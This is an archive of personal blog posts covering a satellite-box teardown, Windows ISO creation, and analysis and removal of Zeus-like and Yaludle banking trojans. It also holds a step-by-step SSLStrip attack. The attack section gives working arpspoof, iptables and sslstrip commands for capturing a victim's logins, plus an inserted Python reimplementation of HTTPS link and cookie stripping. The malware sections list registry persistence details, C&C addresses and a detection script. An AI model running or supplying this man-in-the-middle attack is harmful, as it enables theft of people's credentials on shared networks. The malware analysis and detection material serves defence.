Jun 02 2010

Getting inside the Amstrad DRX895 / 1TB Sky+ HD box

Category: Practical | Parker @ 6:34 pm

Been a while since I have done or learnt anything worthy of publication, but last night I took it upon myself to figure out how to access the internals of my new 1TB Sky HD box and, since there seem to be no other guides, I figured I would stick my neck out.

So, why did I risk voiding my warranty and bricking the brand new box? Well, so that I could transfer all of my old recorded programs from the last box onto the new one; not mission critical, but I had a lot of recorded programs that I still needed to work my way through. I’ll put some guidance on those steps as well, but I would suggest following the FAQs on the Copy + page.

Required tools

  • A standard electrical screwdriver
  • A 2mm / 3mm flat head screwdriver
  • Standard flat pliers

Gaining access

Turn the Sky box upside down, ensuring you place the nice new glossy topside on something that isn’t going to snag or scratch it.

Remove the two plastic ‘grills’ on either end. They should just pop off with a light outward tug. The second photo shows the simple plastic clips that hold them in place.

Pull towards you to remove.

See simple plastic 'retaining clips'

Having removed the side grills, there are four screws which need to be removed from the base of the device and (edit) one from the rear, just above and to the left of the HDMI port.

Remove four encircled screws.

Again from the underside of the box, lift the retaining clasp and ease the outer box forwards. BE CAREFUL TO KEEP IT LEVEL: any torquing may damage the LEDs or buttons on the front of the device.

Carefully lift the clip with a flathead screwdriver and ease the outer box forwards.

You can now remove the remaining side pieces of black plastic, which will probably have fallen off on their own, but are again pushed towards the front of the box to release the ‘L’ retaining clip from the metal case body.

The last piece of the plastic outer body to remove

You should now have only the metal innards of the box; you can turn this the right way up. CAREFULLY remove the ribbon cable from the front connector, to the left of the middle black piece.

Carefully remove from retaining port.

If you now look at the box from above you will see four twisted metal retaining clasps; with a set of pliers, delicately twist these straight.

Twist each of the encircled items straight with pliers.

You should now be able to lift the lid from the front, gently pivoting it at the rear, before lifting it off completely to reveal the compact and surprisingly well organised innards.

The insides that are revealed.

You can now access the SATA data and power connectors for the hard drive in the bottom right hand corner. If using something like Copy +, I would suggest unplugging these and connecting new cables from your PC, rather than trying to remove the hard disk (surely you don’t need more than 1TB anyway….?)



Feb 22 2010

Zeus may be old, but he isn’t afraid of change

Category: Malware, Password Stealing, Practical, Trojan | Parker @ 7:47 pm

I should really lay my cards on the table at the start of this item. I do not know that this is Zeus, it is currently a working assumption, noting a number of similarities between this new virus and other Zeus samples I have seen.

So first off, what is the same?

  • It changes the registry value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit, appending a randomly named executable to the value data so that Winlogon launches it at every boot of the system. In my most recent infection instance, it changes the value data to C:\WINDOWS\system32\userinit.exe,C:\WINDOWS\system32\msicjg32.exe
  • It loads the executable and hides it from view, using rootkit techniques.
  • It conducts HTML injection attacks
  • It is capable of MitB / MitM attacks
  • It targets banking credentials and more than likely other login details, such as PayPal & Facebook.

What is new?

  • The virus no longer uses the static executable name sdra64.exe. Instead it chooses a pseudo-random name at install. I have seen msrwez32.exe | msjrtr32.exe | msicjg32.exe, so it would appear a format of msXXXX32.exe is used.
  • There is no creation of a c:\windows\system32\lowsec folder, so stolen data and configuration detail are stored somewhere other than usual. The configuration would appear to come from a jpg that can be seen coming in if using packet capture. The file is normally at the C&C domain within a location of /images/arrowred.jpg. I have not been able to obtain this file, or indeed find anything that could even attempt to decrypt it, but I am informed that config details are held within it.
  • As with most such trojans, these processes grab config detail from Command & Control servers. To the best of my ability I believe these sites to be http;//216.119.129.14 and http;//209.172.59.132. With luck these will be offline soon. I have now seen that these files have a list of possible C&Cs and move around as quickly as they are taken offline. Those who need to know of them do, and I do not propose to begin retaining a list here.

Antivirus detection rates (20 of the 40 engines below flagged the sample) are as follows:

Product – Version – Update – Virus Alias
a-squared – 4.5.0.50 – 2010.02.22 – Worm.Win32.Pushbot!IK
AhnLab-V3 – 5.0.0.2 – 2010.02.22 – (not detected)
AntiVir – 8.2.1.172 – 2010.02.22 – TR/Spy.ZBot.afdw
Antiy-AVL – 2.0.3.7 – 2010.02.22 – (not detected)
Authentium – 5.2.0.5 – 2010.02.22 – (not detected)
Avast – 4.8.1351.0 – 2010.02.22 – Win32:EggDrop-CG
AVG – 9.0.0.730 – 2010.02.22 – (not detected)
BitDefender – 7.2 – 2010.02.22 – Trojan.Generic.3193268
CAT-QuickHeal – 10.00 – 2010.02.22 – (not detected)
ClamAV – 0.96.0.0-git – 2010.02.22 – Trojan.EggDrop-121
Comodo – 4026 – 2010.02.22 – TrojWare.Win32.Spy.Zbot.afdw
DrWeb – 5.0.1.12222 – 2010.02.22 – Trojan.DownLoad.35735
eSafe – 7.0.17.0 – 2010.02.22 – Win32.EggDrop
eTrust-Vet – 35.2.7318 – 2010.02.22 – (not detected)
F-Prot – 4.5.1.85 – 2010.02.22 – (not detected)
F-Secure – 9.0.15370.0 – 2010.02.22 – Trojan.Generic.3193268
Fortinet – 4.0.14.0 – 2010.02.21 – (not detected)
GData – 19 – 2010.02.22 – Trojan.Generic.3193268
Ikarus – T3.1.1.80.0 – 2010.02.22 – Worm.Win32.Pushbot
Jiangmin – 13.0.900 – 2010.02.22 – (not detected)
K7AntiVirus – 7.10.980 – 2010.02.22 – (not detected)
Kaspersky – 7.0.0.125 – 2010.02.22 – Trojan-Spy.Win32.Zbot.afdw
McAfee – 5900 – 2010.02.22 – (not detected)
McAfee+Artemis – 5900 – 2010.02.22 – Artemis!1B0138229529
McAfee-GW-Edition – 6.8.5 – 2010.02.22 – Heuristic.LooksLike.Trojan.Agent.B
Microsoft – 1.5406 – 2010.02.22 – (not detected)
NOD32 – 4888 – 2010.02.22 – probably a variant of Win32/Injector.AXM
Norman – 6.04.08 – 2010.02.22 – (not detected)
nProtect – 2009.1.8.0 – 2010.02.22 – (not detected)
Panda – 10.0.2.2 – 2010.02.22 – Trj/CI.A
PCTools – 7.0.3.5 – 2010.02.22 – (not detected)
Prevx – 3.0 – 2010.02.22 – High Risk Cloaked Malware
Rising – 22.34.01.03 – 2010.02.11 – (not detected)
Sophos – 4.50.0 – 2010.02.22 – Mal/Resdro-A
Sunbelt – 5692 – 2010.02.22 – Trojan.Win32.Generic!BT
Symantec – 20091.2.0.41 – 2010.02.22 – Suspicious.Insight
TheHacker – 6.5.1.6.205 – 2010.02.22 – (not detected)
TrendMicro – 9.120.0.1004 – 2010.02.22 – (not detected)
VBA32 – 3.12.12.2 – 2010.02.22 – (not detected)
ViRobot – 2010.2.22.2196 – 2010.02.22 – (not detected)

Removal

I am not yet confident in the exact way in which this malware functions, so I am not confident that the below is an absolute removal process. It does however appear to resolve the issue, so is better than nothing. As soon as I learn more, I will be sure to update.

  • Open regedit (normally via Start > Run) and drill down to the HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit value and note its value data.
  • You will need to kill a thread, loaded into memory, which keeps re-writing the malicious entry into the Winlogon key; simply deleting the malicious value data is not enough.
  • Download and run Process Explorer (Sysinternals, from the TechNet website).
  • Open the View menu and ensure that Lower Pane View is enabled.
  • On the top menu bar, select Find > Find Handle or DLL and search for the executable name found within the Userinit value data (msXXXX32.exe).
  • This should find and select the executable within your lower pane. In the top pane, locate and double-click winlogon.exe.
  • From the new window select the Threads tab (this will sometimes produce an error, which can just be clicked past).
  • Once the threads have displayed, sort by CSwitch Delta. There will be one thread which shows as constantly active (retains a numeric value).
  • Once this thread is identified, highlight it and select Kill from the bottom right.
  • Exit Process Explorer, reopen regedit and drill down to the Winlogon\Userinit value. Delete the malicious entry from the Userinit value data, leaving the stock value C:\WINDOWS\system32\userinit.exe, (including the trailing comma).
  • Restart the PC.
  • This should have stopped the virus loading at boot, allowing you to locate the executable within C:\WINDOWS\system32\ (while running it hides itself, which is why it was not visible before). This should be purged from the system.



Feb 21 2010

Updates aplenty.

Category: Practical | Parker @ 6:32 pm

Having awoken to snow this morning, my day has been a little less busy than previously planned. So I have taken the opportunity to address some issues within this site.

Many of the ‘articles’ are written whilst I do something else, so attention to detail can sometimes be a little lacking. Because of this, I have taken the time to correct any spelling, grammar or layout issues that I found on a re-read. Further to this I have added a bit more meat to the bones of certain articles, such as the Silon and Zeus documents.


Feb 12 2010

Attempts to infect a machine fall flat

Category: Malware, Practical, Trojan | Parker @ 7:09 pm

Who would think that infecting a machine with a virus would be this difficult? Have done all I can think of, but I only have muted success in getting a bloody malicious DLL to start messing with my data streams.

Will have a few more goes before I either give up or blame a poor implementation.



Jan 30 2010

Quick Update

Category: Practical | Parker @ 7:17 pm

Well, it certainly wasn’t quick, but I have taken some time to organise things a little better within the malware sample section and have also added my personal twist to the WordPress theme I use.

Not awe inspiring, but think it looks OK.


Jan 24 2010

Backtrack 4 & SSLStrip-0.7 at last!

Category: Password Stealing, Practical | Parker @ 9:56 pm

OK,

So I have been wanting to document this for a while, but have failed to do so. Luckily time and the recent BackTrack4 final release have conspired with me today, so I have been able to do it at last. So, sitting comfortably? Here comes the science bit.

Before you do this, I suggest you have the following installed: SSLStrip and Python. Make sure you also have a Linux distribution (such as BackTrack) and a hardware combination that supports ARP injection. Once all of that is in place, you can conduct what is a very simple attack. (For reference I use an Acer Aspire One Z250 and BackTrack 4.)

  • First enable IP forwarding with the following command in a terminal window: echo 1 > /proc/sys/net/ipv4/ip_forward
  • Then define what traffic you wish to capture (always port 80, I would think) and which port you will forward this traffic to. The values in angle brackets should be replaced with the relevant ports: iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port <listenPort>
  • You must now use that clever man’s Python script to start stripping out the SSL, matching the listen port with the one above: python sslstrip.py -l <listenPort>

Having set your machine to pick up, forward and inspect all the traffic from your target machine, what we now need to do is ensure that all the traffic from the target machine is actually routed through your hardware. We do this with a Man In The Middle attack, placing yourself between the target machine and the network router.
We achieve this with a simple ARP spoofing attack, which continually ‘informs’ the target machine that you are the router with which it wishes to speak.

  • Within a new terminal window (to keep it clean, if nothing else), enter the following (the values in angle brackets should be replaced with the relevant values): arpspoof -i <interface> -t <targetIP> <gatewayIP>


Now all you need do is wait. All the target machine’s traffic will route through your machine and their browsing will probably seem slow, but any site which the user first reaches over plain HTTP and is only then redirected to HTTPS will be easy prey, because the redirect and every https:// link are rewritten before they reach the browser; the site’s TLS itself is never attacked. (A site the browser already knows via HSTS, or one the user reaches by typing https:// directly, is never fetched over HTTP in the first place, so there is nothing to strip.) The data that is captured will be placed into a .log file and is available by opening a new terminal and entering more sslstrip.log (ensuring you are in the SSLStrip directory).

You’ll note that such popular sites as www.facebook.com / www.twitter.com and the “newly secure” www.gmail.com are all easy pickings!
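What sslstrip actually does to the forwarded traffic, as an added example (my own code, not Moxie Marlinspike’s sslstrip and not from the original post): it rewrites https:// links, form actions and redirect targets to http:// on the way to the victim, strips the Secure flag from cookies, remembers which URLs it downgraded, and re-upgrades those requests to HTTPS when it fetches them from the real server. The sample HTML, headers and hostnames are constructed here so it runs offline, and the URL regex is a simplification of what the real tool does.

```python
import re
from typing import Dict, Tuple

# Absolute https:// URLs in HTML, JS or a Location header. Host (with optional
# port) and path are captured separately so the downgraded URL can be rebuilt.
HTTPS_URL_RE = re.compile(r"https://([A-Za-z0-9.\-]+(?::\d+)?)(/[^\s\"'<>]*)?")


class Stripper:
    """Remembers every URL the victim was handed over plain HTTP so the matching
    upstream request can be sent over HTTPS, exactly as the real site expects."""

    def __init__(self) -> None:
        self.stripped: Dict[Tuple[str, str], bool] = {}

    def _downgrade(self, m: "re.Match[str]") -> str:
        host, path = m.group(1), m.group(2) or "/"
        self.stripped[(host, path)] = True
        return f"http://{host}{path}"

    def rewrite_body(self, body: str) -> str:
        """Rewrite every https:// link, form action or script URL to http://."""
        return HTTPS_URL_RE.sub(self._downgrade, body)

    def rewrite_headers(self, headers: Dict[str, str]) -> Dict[str, str]:
        """Downgrade a Location redirect, drop the Secure flag from cookies (the
        browser would otherwise refuse to send the session cookie back over the
        plain-HTTP leg) and drop HSTS, which would pin the browser to HTTPS."""
        out: Dict[str, str] = {}
        for name, value in headers.items():
            lname = name.lower()
            if lname == "location":
                value = HTTPS_URL_RE.sub(self._downgrade, value)
            elif lname == "set-cookie":
                value = re.sub(r";\s*secure(?=;|$)", "", value, flags=re.IGNORECASE)
            elif lname == "strict-transport-security":
                continue
            out[name] = value
        return out

    def upstream_url(self, host: str, path: str) -> str:
        """URL the attacker's proxy fetches on the victim's behalf: HTTPS if this
        is a link we downgraded, plain HTTP if the site never used TLS here."""
        scheme = "https" if (host, path) in self.stripped else "http"
        return f"{scheme}://{host}{path}"


# Constructed sample response from a login page (not captured traffic).
SAMPLE_BODY = (
    '<form action="https://login.example.com/auth" method="post">'
    '<a href="https://mail.example.com/inbox">Mail</a>'
    '<a href="http://www.example.com/">Home</a>'
)
SAMPLE_HEADERS = {
    "Location": "https://login.example.com/",
    "Set-Cookie": "SID=abc123; Path=/; Secure; HttpOnly",
    "Strict-Transport-Security": "max-age=31536000",
}


def demo() -> Tuple[str, Dict[str, str], "Stripper"]:
    s = Stripper()
    return s.rewrite_body(SAMPLE_BODY), s.rewrite_headers(SAMPLE_HEADERS), s


if __name__ == "__main__":
    body, headers, s = demo()
    print(body)
    print(headers)
    # The victim posts to http://login.example.com/auth; we replay it over TLS.
    print(s.upstream_url("login.example.com", "/auth"))
```

On the victim’s side the page now contains only http:// links, so the padlock never appears; the only tell-tale for the user is the missing https in the address bar. The last branch in rewrite_headers is also the limit of the technique: a host the browser has already pinned via HSTS (or the preload list) is never contacted over HTTP, so the proxy never sees a request to downgrade.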

Details captured by SSLStrip

I thank you!


Jan 14 2010

MitM attack with SSLStrip

Category: Practical | Parker @ 8:24 am

Urm, got kind of distracted of late and haven’t got around to documenting how you conduct the same attack on a LAN. Have just found out that BackTrack4 Final has been released though, so I will install that and then do it. I promise.



Jan 04 2010

Yaludle

Category: Malware, Practical, Programs, Trojan | Parker @ 9:27 pm

Well, another virus that’s on the radar, this time one carrying the alias Yaludle.
No real info on the installer or exploit type, but suffice it to say this one is bad news: by replacing a number of driver entries (Drivers32) in your registry, it ensures that it loads every time your PC does.

As a very quick synopsis of the risks, this virus is capable of Man In The Browser / Man In The Middle attacks, which will typically go after your banking credentials, but as with many banking trojans it is not averse to going after your other sensitive info with keylogging.

Anyway, to get rid of it, you need to do as follows:

  1. Close all instances of Internet Explorer.
  2. Open ProcessExplorer and Regedit.
  3. Get the DLL name from the registry value HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Drivers32\midi2 and write it down somewhere. It should be in the format of 8 hex digits + 1.
  4. Use Process Explorer to search for that hex value, then locate and close every handle found that carries it (some may be mutex objects). In Process Explorer: View > Lower Pane View > Handles (or Ctrl+H), then Find > Find Handle or DLL and search for the first 4 digits of the file name. You get a list of handles that relate to the malware; close them with Process Explorer or handle.exe.

Delete these registry values and keys:

  • HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Drivers32\midi2
  • HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Drivers32\wave1
  • HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Drivers32\aux2
  • HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Drivers32\mixer2
  • HKCU\Software\Macromedia\
  • HKCU\Software\AppDataLow\Software\Macromedia\
  • HKCU\Software\Microsoft\Windows\CurrentVersion\Run\WAB

Delete these files:

  • %AppData%\Macromedia\Common\(8-digit-hex).exe
  • %TMP%\(8-digit-hex).tmp

I also recommend clearing the Temp folders on that machine:

  • %Temp%
  • %Systemroot%\Temp

Having done all of that, a restart of the machine should load without any malicious Yaludle items present. For peace of mind, you can repeat step 4 above to ensure that no handles or other loaded objects still carry that hex value.
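The Zeus removal steps earlier on this page and the Yaludle steps above both come down to the same check: read a handful of registry values and spot an entry that does not belong. As an added example (my own code, not the post author’s and not a vendor tool), the script below does that for the Winlogon\Userinit value and the Drivers32 values. The sample registry data is constructed here so it runs offline (the Userinit string is the one quoted in the Zeus write-up; the Drivers32 entries and the file path are made up); the hex-name pattern assumes “8 hex digits + 1” means one extra character before the extension, and read_live() only works on a Windows box.

```python
import re
from typing import Dict, List

# Stock Userinit data on XP/Vista/7: userinit.exe followed by a trailing comma.
LEGIT_USERINIT = r"c:\windows\system32\userinit.exe"
# Names seen in the Zeus write-up: msrwez32.exe, msjrtr32.exe, msicjg32.exe.
ZEUS_NAME_RE = re.compile(r"^ms[a-z]{4}32\.exe$", re.IGNORECASE)
# Yaludle's dropped file: 8 hex digits (+ one extra character, assumed) and an extension.
HEX_NAME_RE = re.compile(r"^[0-9a-f]{8}.?\.(exe|dll|tmp)$", re.IGNORECASE)
# Drivers32 value names the Yaludle write-up says it hijacks. They can also be
# legitimate second-device mappings, so the file name is the stronger signal.
YALUDLE_DRIVER_VALUES = ("midi2", "wave1", "aux2", "mixer2")


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1]


def audit_userinit(data: str) -> List[str]:
    """Return every Userinit entry other than the stock userinit.exe, tagged."""
    findings = []
    for entry in data.split(","):
        entry = entry.strip().strip('"')
        if not entry or entry.lower() == LEGIT_USERINIT:
            continue  # the empty string is the trailing comma of the stock value
        tag = "zeus-style name" if ZEUS_NAME_RE.match(basename(entry)) else "unexpected entry"
        findings.append(f"Userinit: {entry} [{tag}]")
    return findings


def audit_drivers32(values: Dict[str, str]) -> List[str]:
    """Flag Drivers32 values that point at a hex-named file or use one of the
    value names listed for Yaludle. Stock entries such as wavemapper=msacm32.drv pass."""
    findings = []
    for name, data in values.items():
        reasons = []
        if name.lower() in YALUDLE_DRIVER_VALUES:
            reasons.append("value name listed for Yaludle")
        if HEX_NAME_RE.match(basename(data)):
            reasons.append("hex-named file")
        if reasons:
            findings.append(f"Drivers32\\{name} = {data} [{'; '.join(reasons)}]")
    return findings


def read_live() -> List[str]:
    """Run both checks against the live registry (Windows only). Reading needs
    no admin rights, but a rootkit-hidden file still needs the thread killed as
    described above before it can be deleted."""
    import winreg  # imported here so the module still loads on Linux
    base = r"SOFTWARE\Microsoft\Windows NT\CurrentVersion"
    with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, base + r"\Winlogon") as key:
        userinit, _ = winreg.QueryValueEx(key, "Userinit")
    drivers: Dict[str, str] = {}
    with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, base + r"\Drivers32") as key:
        index = 0
        while True:
            try:
                name, data, _ = winreg.EnumValue(key, index)
            except OSError:
                break  # no more values
            drivers[name] = str(data)
            index += 1
    return audit_userinit(userinit) + audit_drivers32(drivers)


# Constructed sample data: the Userinit string is the one quoted in the Zeus
# post; the Drivers32 entries are made up to exercise each rule.
SAMPLE_USERINIT = r"C:\WINDOWS\system32\userinit.exe,C:\WINDOWS\system32\msicjg32.exe"
SAMPLE_DRIVERS32 = {
    "wavemapper": "msacm32.drv",
    "midi2": r"C:\Documents and Settings\user\Application Data\Macromedia\Common\1f4a9c2eb.dll",
    "wave1": "wdmaud.drv",
}

if __name__ == "__main__":
    for line in audit_userinit(SAMPLE_USERINIT) + audit_drivers32(SAMPLE_DRIVERS32):
        print(line)
```

The two audits are deliberately separate functions so that each can be fed from a registry export (reg export / a .reg file parsed elsewhere) when the machine is being examined offline rather than from the live hive.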


Dec 30 2009

Coming up….

Category: Practical, Programs | Parker @ 1:24 pm

Well, as soon as I’ve settled upon the location of the new Denon DM37DAB AV I’ve just got, I’ll be documenting a Man In The Middle attack using my Acer netbook, BackTrack4 and a Linux tool named SSLStrip.

Should point out that I learnt what I know from a podcast show called Hak5. Check them out at http://hak5.org (well worth a look; they often discuss very interesting items that you can play with and learn from at home).



Oct 23 2009

Windows 7 ISO creation post Digital River download

Category: Practical, Programs | Parker @ 9:41 am

So I got the Digital River digital download of Windows 7. Assuming that I would receive all the details promptly and that I would be able to download an ISO image was, it seems, a HUGE assumption, because neither was the case. What I did receive via email was guidance text with blank spaces where my download link and product key should have been. Still waiting on my key, but at least this morning I was able to locate the download tool within my orders on the Digital River site.

So, whilst awaiting my product key, I have been trawling the internet in the hope of finding some guidance on turning their exe installer into an ISO.
Having found some misguidance, I have finally found a guide with the correct steps, so thought it best to note it here.

  • To create the ISO, first download the installer, move it to the root of your C:\ drive and double-click the exe.
  • An expandedSetup folder will be created; when the installation window opens, close it down.
  • Grab oscdimg.exe (the file linked from the original post; it ships with the Windows AIK) and extract it to your C:\Windows\System32 folder.
  • Now open cmd as admin and type the following (without the quotation marks at either end):
  • “oscdimg -bC:\expandedSetup\boot\etfsboot.com -h -u2 -m -lWIN_EN_DVD C:\expandedSetup\ C:\win7.iso”

Within 5 minutes you should have an ISO image called win7.iso on your C:\ drive, ready to burn.

Thanks and praise goes to ‘robbdn’ on technet, who was the first person I found who provided the correct command syntax.


